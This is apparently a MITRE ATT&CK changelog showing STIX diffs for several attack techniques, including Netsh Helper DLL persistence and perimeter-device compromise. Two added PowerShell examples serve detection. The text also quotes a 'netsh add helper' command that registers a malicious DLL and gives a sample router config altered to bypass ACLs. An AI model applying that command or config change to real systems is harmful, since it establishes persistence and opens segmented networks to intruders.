| external_references[1]['source_name'] | NT API Windows | MACOS Cocoa |
| external_references[1]['description'] | The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020. | Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://undocumented.ntinternals.net/ | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1 |
| external_references[2]['source_name'] | Linux Kernel API | Apple Core Services |
| external_references[2]['description'] | Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020. | Apple. (n.d.). Core Services. Retrieved June 25, 2020. |
| external_references[2]['url'] | https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html | https://developer.apple.com/documentation/coreservices |
| external_references[3]['source_name'] | OutFlank System Calls | macOS Foundation |
| external_references[3]['description'] | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. | Apple. (n.d.). Foundation. Retrieved July 1, 2020. |
| external_references[3]['url'] | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ | https://developer.apple.com/documentation/foundation |
| external_references[4]['source_name'] | CyberBit System Calls | OutFlank System Calls |
| external_references[4]['description'] | Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021. | de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021. |
| external_references[4]['url'] | https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ | https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ |
| external_references[5]['source_name'] | MDSec System Calls | GNU Fork |
| external_references[5]['description'] | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. | Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020. |
| external_references[5]['url'] | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ | https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html |
| external_references[6]['source_name'] | Microsoft CreateProcess | CyberBit System Calls |
| external_references[6]['description'] | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. | Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021. |
| external_references[6]['url'] | http://msdn.microsoft.com/en-us/library/ms682425 | https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/ |
| external_references[7]['source_name'] | GNU Fork | GLIBC |
| external_references[7]['description'] | Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020. | glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020. |
| external_references[7]['url'] | https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html | https://www.gnu.org/software/libc/ |
| external_references[8]['source_name'] | Microsoft Win32 | LIBC |
| external_references[8]['description'] | Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020. | Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020. |
| external_references[8]['url'] | https://docs.microsoft.com/en-us/windows/win32/api/ | https://man7.org/linux/man-pages//man7/libc.7.html |
| external_references[9]['source_name'] | LIBC | Linux Kernel API |
| external_references[9]['description'] | Kerrisk, M. (2016, December 12). libc(7) — Linux manual page. Retrieved June 25, 2020. | Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020. |
| external_references[9]['url'] | https://man7.org/linux/man-pages//man7/libc.7.html | https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html |
| external_references[10]['source_name'] | GLIBC | MDSec System Calls |
| external_references[10]['description'] | glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020. | MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021. |
| external_references[10]['url'] | https://www.gnu.org/software/libc/ | https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/ |
| external_references[11]['source_name'] | Microsoft NET | Microsoft CreateProcess |
| external_references[11]['description'] | Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020. | Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. |
| external_references[11]['url'] | https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework | http://msdn.microsoft.com/en-us/library/ms682425 |
| external_references[12]['source_name'] | Apple Core Services | Microsoft Win32 |
| external_references[12]['description'] | Apple. (n.d.). Core Services. Retrieved June 25, 2020. | Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020. |
| external_references[12]['url'] | https://developer.apple.com/documentation/coreservices | https://docs.microsoft.com/en-us/windows/win32/api/ |
| external_references[13]['source_name'] | MACOS Cocoa | Microsoft NET |
| external_references[13]['description'] | Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020. | Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020. |
| external_references[13]['url'] | https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1 | https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework |
| external_references[14]['source_name'] | macOS Foundation | NT API Windows |
| external_references[14]['description'] | Apple. (n.d.). Foundation. Retrieved July 1, 2020. | The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020. |
| external_references[14]['url'] | https://developer.apple.com/documentation/foundation | https://undocumented.ntinternals.net/ |
| x_mitre_data_sources[0] | Process: OS API Execution | Module: Module Load |
| x_mitre_data_sources[1] | Module: Module Load | Process: OS API Execution |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 18:28:07.793000+00:00 | 2022-04-20 17:09:17.363000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) |
| external_references[1]['source_name'] | TechNet Netsh | Demaske Netsh Persistence |
| external_references[1]['description'] | Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. | Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. |
| external_references[1]['url'] | https://technet.microsoft.com/library/bb490939.aspx | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html |
| external_references[2]['source_name'] | Github Netsh Helper CS Beacon | TechNet Netsh |
| external_references[2]['description'] | Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017. | Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. |
| external_references[2]['url'] | https://github.com/outflankbv/NetshHelperBeacon | https://technet.microsoft.com/library/bb490939.aspx |
| external_references[3]['source_name'] | Demaske Netsh Persistence | Github Netsh Helper CS Beacon |
| external_references[3]['description'] | Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. | Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017. |
| external_references[3]['url'] | https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html | https://github.com/outflankbv/NetshHelperBeacon |
| x_mitre_detection | It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence) |
It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence) |
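An added example, not code from ATT&CK or from the cited posts, that turns the detection guidance above into two checks: an audit of the helper registrations under `HKLM\SOFTWARE\Microsoft\Netsh`, and a search for processes whose parent is `netsh.exe`. It assumes the registry values hold either a bare DLL name (the stock helpers) or a full path (what `netsh add helper C:\path\evil.dll` writes); a bare name is resolved against `System32` here for the signature check, since netsh itself loads it through the normal DLL search order. The function names and the `-Hours` window are this example's own.

```powershell
# Added example: audit netsh helper DLLs and hunt for netsh.exe child processes.

function Get-NetshHelperAudit {
    $key  = 'HKLM:\SOFTWARE\Microsoft\Netsh'
    $item = Get-ItemProperty -Path $key -ErrorAction Stop
    $meta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'   # provider noise, not helpers
    foreach ($prop in $item.PSObject.Properties) {
        if ($prop.Name -in $meta) { continue }
        $value = [string]$prop.Value
        # Assumption: bare names resolve to System32, the same place netsh finds them via the DLL search order.
        $path  = if ([System.IO.Path]::IsPathRooted($value)) { $value } else { Join-Path "$env:SystemRoot\System32" $value }
        $exists = Test-Path -LiteralPath $path -PathType Leaf
        $sig = if ($exists) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        $inSystem32 = $path -like "$env:SystemRoot\System32\*"
        $msSigned = $sig -and $sig.Status -eq 'Valid' -and $sig.SignerCertificate.Subject -like '*Microsoft*'
        [pscustomobject]@{
            Helper     = $prop.Name
            Value      = $value
            ResolvedTo = $path
            SigStatus  = if ($sig) { [string]$sig.Status } else { 'NoFile' }
            # A helper outside System32, missing, or not Microsoft-signed does not match the stock set.
            Suspicious = -not ($exists -and $inSystem32 -and $msSigned)
        }
    }
}

function Get-NetshChildProcesses {
    # Sysmon event ID 1 (process creation) carries Image, CommandLine and ParentImage.
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data['ParentImage'] -like '*\netsh.exe') {
            [pscustomobject]@{ Time = $_.TimeCreated; Image = $data['Image']; CommandLine = $data['CommandLine'] }
        }
    }
}

Get-NetshHelperAudit | Where-Object Suspicious | Format-Table -AutoSize
Get-NetshChildProcesses -Hours 72 | Format-Table -AutoSize
```

The registry audit is the durable check: a malicious helper is loaded every time netsh.exe starts, so the registration persists even when no netsh process happens to be running. The child-process query only catches helpers that spawn something; a helper that runs entirely in-process (a beacon thread, as in the cited NetshHelperBeacon) shows up in the audit but not there.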
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Traffic can be restricted by IP address, by layer 4 protocol port, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Where a border device separates two organizations, the adversary can also facilitate lateral movement into new victim environments. | Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. 
They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Traffic can be restricted by IP address, by layer 4 protocol port, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) Where a border device separates two organizations, the adversary can also facilitate lateral movement into new victim environments. |
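The reconfiguration the description talks about, inserting a permit ahead of the deny that would otherwise stop the adversary's traffic, leaves a trace in the device configuration. The following is an added example, not from ATT&CK or the cited report, that diffs a segmentation device's running configuration against its approved baseline and categorises the changes that move traffic across the trust boundary. Both configurations are constructed, Cisco-style samples, not captures from a real device; the ACL number, addresses and interface names are invented for the illustration.

```powershell
# Added example: golden-config diff for a boundary device, with the changes
# that matter for trust-boundary bypass called out by category and position.

$BaselineConfig = @'
access-list 101 deny   ip 10.10.0.0 0.0.255.255 10.20.0.0 0.0.255.255
access-list 101 permit tcp 10.10.0.0 0.0.255.255 host 10.20.5.10 eq 443
access-list 101 deny   ip any any log
ip nat inside source list NAT-OUT interface GigabitEthernet0/0 overload
'@

# Constructed "after" state: a permit inserted ahead of the deny, logging dropped
# from the final deny, and a static route added towards a network of the adversary's choosing.
$RunningConfig = @'
access-list 101 permit ip host 10.10.3.44 10.20.0.0 0.0.255.255
access-list 101 deny   ip 10.10.0.0 0.0.255.255 10.20.0.0 0.0.255.255
access-list 101 permit tcp 10.10.0.0 0.0.255.255 host 10.20.5.10 eq 443
access-list 101 deny   ip any any
ip nat inside source list NAT-OUT interface GigabitEthernet0/0 overload
ip route 192.168.99.0 255.255.255.0 10.20.0.254
'@

function Get-ConfigLines {
    param([string]$Text)
    # Collapse runs of whitespace so re-indented or re-aligned lines do not show up as changes.
    $Text -split "`r?`n" | Where-Object { $_.Trim() } | ForEach-Object { ($_ -replace '\s+', ' ').Trim() }
}

function Compare-BoundaryConfig {
    param([string]$BaselineText, [string]$RunningText)
    $base = @(Get-ConfigLines $BaselineText)
    $run  = @(Get-ConfigLines $RunningText)
    Compare-Object -ReferenceObject $base -DifferenceObject $run | ForEach-Object {
        $line  = $_.InputObject
        $added = $_.SideIndicator -eq '=>'
        $category = switch -Regex ($line) {
            '^access-list \S+ permit' { 'ACL permit';   break }
            '^access-list \S+ deny'   { 'ACL deny';     break }
            '^ip route '              { 'static route'; break }
            '^ip nat '                { 'NAT';          break }
            default                   { 'other' }
        }
        [pscustomobject]@{
            Change   = if ($added) { 'added' } else { 'removed' }
            Category = $category
            # ACLs are evaluated top-down: an added permit matters most when it lands above the deny it defeats.
            Position = if ($added) { [array]::IndexOf($run, $line) + 1 } else { '' }
            Line     = $line
        }
    }
}

Compare-BoundaryConfig -BaselineText $BaselineConfig -RunningText $RunningConfig | Format-Table -AutoSize
```

On the sample above the output shows the new permit at position 1 (above the deny), the `deny ip any any log` line as removed with a non-logging `deny ip any any` added in its place, and the new static route. A modified line always appears as a removed/added pair, because `Compare-Object` compares whole lines; the position column is what distinguishes a harmless reordering from a permit that now shadows a deny.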
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 01:45:59.246000+00:00 | 2022-05-05 05:05:44.200000+00:00 |
| description | Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Traffic can be restricted by IP address, by layer 4 protocol port, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Where a border device separates two organizations, the adversary can also facilitate lateral movement into new victim environments. | Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks. Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. 
They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Traffic can be restricted by IP address, by layer 4 protocol port, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised. When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hindrance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) Where a border device separates two organizations, the adversary can also facilitate lateral movement into new victim environments. |
| x_mitre_defense_bypassed[0] | Router ACL | Firewall |
| x_mitre_defense_bypassed[1] | Firewall | System Access Controls |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Kaspersky ThreatNeedle Feb 2021', 'description': 'Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus targets defense industry with ThreatNeedle. Retrieved October 27, 2021.', 'url': 'https://securelist.com/lazarus-threatneedle/100803/'} |
| Description |
|---|
| Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) A Network DoS occurs when the bandwidth capacity of the network connection to a system is exhausted by the volume of malicious traffic directed at the resource or at the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or by multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). Several aspects apply across Network DoS methods, including IP address spoofing and the use of botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This makes the attack harder to defend against by reducing or eliminating the effectiveness of source-address filtering on network defense devices. For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-12 18:34:06.995000+00:00 | 2022-03-25 20:05:40.122000+00:00 |
| Old Description | New Description |
|---|---|
| Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include code implanted into the network device's operating system to provide adversaries access using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code first checks whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on for normal verification, so potentially valid credentials still work.(Citation: FireEye - Synful Knock) | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include code implanted into the network device's operating system to provide adversaries access using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code first checks whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on for normal verification, so potentially valid credentials still work.(Citation: Mandiant - Synful Knock) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 20:11:00.356000+00:00 | 2021-12-14 23:14:26.107000+00:00 |
| description | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include code implanted into the network device's operating system to provide adversaries access using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code first checks whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on for normal verification, so potentially valid credentials still work.(Citation: FireEye - Synful Knock) | Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing native authentication mechanisms for local accounts on network devices. [Modify System Image](https://attack.mitre.org/techniques/T1601) may include code implanted into the network device's operating system to provide adversaries access using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code first checks whether the user input is that password. If so, access is granted. Otherwise, the implanted code passes the credentials on for normal verification, so potentially valid credentials still work.(Citation: Mandiant - Synful Knock) |
| external_references[1]['source_name'] | FireEye - Synful Knock | Mandiant - Synful Knock |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html | https://www.mandiant.com/resources/synful-knock-acis |
| Old Description | New Description |
|---|---|
| Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution) | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. 
The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 15:57:50.800000+00:00 | 2022-04-19 20:28:09.848000+00:00 |
| description | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution) | Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate.<br>The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution) |
| external_references[1]['source_name'] | Cisco Synful Knock Evolution | Cisco IOS Software Integrity Assurance - Command History |
| external_references[1]['description'] | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. | Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. |
| external_references[1]['url'] | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices | https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 |
| external_references[2]['source_name'] | Cisco IOS Software Integrity Assurance - Command History | Cisco Synful Knock Evolution |
| external_references[2]['description'] | Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020. | Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020. |
| external_references[2]['url'] | https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 | https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices |
| Old Description | New Description |
|---|---|
